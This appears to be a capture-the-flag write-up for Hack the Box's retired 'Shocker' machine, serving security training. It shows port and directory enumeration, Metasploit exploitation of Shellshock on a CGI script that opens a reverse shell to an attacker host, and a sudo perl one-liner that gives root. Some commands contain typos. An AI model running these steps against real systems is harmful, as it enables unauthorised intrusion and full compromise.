Hack the Box Challenge: Shocker

Hello friends!! Today we are going to solve another CTF challenge “Shocker” which is lab presented by Hack the Box for making online penetration practices according to your experience level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Shocker lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s Breach!!!

Firstly let’s enumerate ports in context to identify running services and open ports of victim’s machine by using the most popular tool Nmap.

nmap -p-  -A 10.10.10.56

Awesome!! Nmap has done remarkable job by dumping the details of services running on open port 80, 2222.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser and following image as shown below.

Next we use dirb tool of kali to enumerate the directories and found some important directories such as /cgi-bin ,index.html, server-status

dirb http://10.10.10.56

As /cgi-bin / is a restricted directory, let’s look for a .sh file in the directory using dirb

dirb http://10.10.10.56/cgi-bin -X .sh

Great we have the user.sh in the cgi-bin directory.

We downloaded the user.sh by opening the URL http://10.10.10.56/cgi-bin/user.sh

Now let’s open the user.sh file using cat

cat user.sh

If you will Google for Apache webserver with URI of /cgi-bin/ then you will realize that it could be Shellshock vulnerability therefore let for its exploitation using metasploit.

Open a terminal type msfconsole for loading metasploit framework and use following module. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

use exploit/multi/http/apache_mod_cgi_bash_env_exec

msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 10.10.10.56

msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 10.10.14.6

msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /gci-bin/user.sh

msf exploit(apache_mod_cgi_bash_env_exec) >expoit

And we got victim’s reverse connection through meterpreter session 1 and hence our prediction is true the target was vulnerable to shellshock.

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it.

cd home

ls

Here one directories shelly, when I explore /shelly I saw user.txt and use cat command for reading.

cd shelly

ls

cat user.txt

Great!!  Here we had completed 1^st task now move to 2^nd tasK

For accessing root directory we need root privilege therefore next we use python one liner for spawning pty shell.

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Great!!  I logged in successfully and check shelly’s privileged and roles using sudo -l and found he has root privileged and an indication for a directory /usr/bin/perl with NOPASSWD. Now let’s get the root.txt by executing following command.

sudo perl –e ‘exec “/bin/sh”’

id

ls

root.txt

We have successfully completed 2^nd task.

Enjoy Hacking!!